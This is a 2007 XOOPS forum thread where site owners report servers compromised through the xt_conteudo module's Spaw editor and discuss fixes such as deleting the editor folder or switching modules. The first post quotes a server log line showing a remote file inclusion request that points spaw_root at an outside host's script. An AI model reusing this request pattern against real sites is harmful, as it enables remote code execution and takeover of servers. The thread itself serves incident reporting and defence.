xt_contuedo is NOT safe [Module troubleshooting] - XOOPS Web Application System

XOOPS

Forum

Forum Index General Forums Community Support Modules Support Themes Support Development International Support Module Hack Reviews Theme Designer Talk

1

xt_contuedo is NOT safe

2007/5/30 15:19
guus20
Just popping in
Posts: 1
Since: 2007/5/30

Our server was hacked trough xt_contuedo by inserting malicious code in the Spaw editor. Then they used our server for sending out spyware.

LOG
============================

209.85.105.25 - - [30/May/2007:00:41:42 +0200] "GET /modules/xt_conteudo/admin/spaw/main.php?spaw_root=http://ikhlas.com.my/57.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.79"
============================

Please be adviced xt_contedo isn't SAFE.

2

Re: xt_contuedo is NOT safe

2007/5/30 15:36
JimLunsford
Not too shy to talk
Posts: 191
Since: 2004/10/26

Isn't that also built into the Mastop Publishing module? Big problems for that module if that is true.

3

Re: xt_contuedo is NOT safe

2007/5/30 17:50
orgunozcu
Not too shy to talk
Posts: 136
Since: 2005/9/1 5

it is very big problem. somone tried to my site too. now i cant use Spaw and other editors for xt_conteudo and some smiler modules.

how can we solve??

whttp://www.cancer-aids.net

http://www.cinselliksaglik.com

http://www.konyaninsesi.com
http://www.psikolojikdanisman.org
http://www.xoopshocasi.com

4

Re: xt_contuedo is NOT safe

2007/5/30 18:27
topet05
Just popping in
Posts: 33
Since: 2003/4/19

Mastop Publish was developed from zero and dont use the Spaw Editor, but TinyMCE.
XT-Conteudo was discontinued lot time ago.
How fix it? Change your XT-Conteudo for Mastop Publish.
We will develop a upgrader soon.
Regards

5

Re: xt_contuedo is NOT safe

2007/5/30 23:51
wcrwcr
Home away from home
Posts: 1114
Since: 2003/12/12

Hi all

Just to inform that the old tinycontent is vulnerable too
.
SAme happens to me in an old XOOPS site.

I?ve just deleted the spawn folder..just in case

6

Re: xt_contuedo is NOT safe

2007/5/31 4:18
ewonline
Not too shy to talk
Posts: 198
Since: 2004/11/17

You should edit your post to remove that URL so others dont find out use that exploit.

Resized Image

Login

Username

Password

Remember me

Register now! | Lost Password?

Search

Advanced Search

Recent Posts

XOOPS MyMenus 1.54.0 Beta 10

11/18 11:08 Mamba
Re: XOOPS MyMenus 1.54.0 Beta 7

11/18 11:06 Mamba
Re: XOOPS MyMenus 1.54.0 Beta 7

11/16 12:32 liomj
Re: XOOPS MyMenus 1.54.0 Beta 7

11/15 18:06 Mamba
Re: XOOPS MyMenus 1.54.0 Beta 7

11/15 5:33 liomj
Re: XOOPS MyMenus 1.54.0 Beta 7

11/15 5:29 liomj
Re: XOOPS MyMenus 1.54.0 Beta 7

11/15 4:39 Mamba
Re: XOOPS MyMenus 1.54.0 Beta 7

11/15 3:50 liomj
Re: XOOPS MyMenus 1.54.0 Beta 7

11/15 3:31 Mamba
Re: XOOPS MyMenus 1.54.0 Beta 7

11/15 1:48 Mamba

Who's Online

454 user(s) are online (321 user(s) are browsing Support Forums)

Members: 0

Guests: 454

Donat-O-Meter

Stats
Goal:	$100.00
Due Date:	Nov 30
Gross Amount:	$0.00
Net Balance:	$0.00
Left to go:	$100.00

Latest GitHub Commits

{{ record.sha.slice(0, 7) }} - {{ record.commit.message | truncate }}

{{ record.commit.author.name }} {{ record.commit.author.date | formatDate }}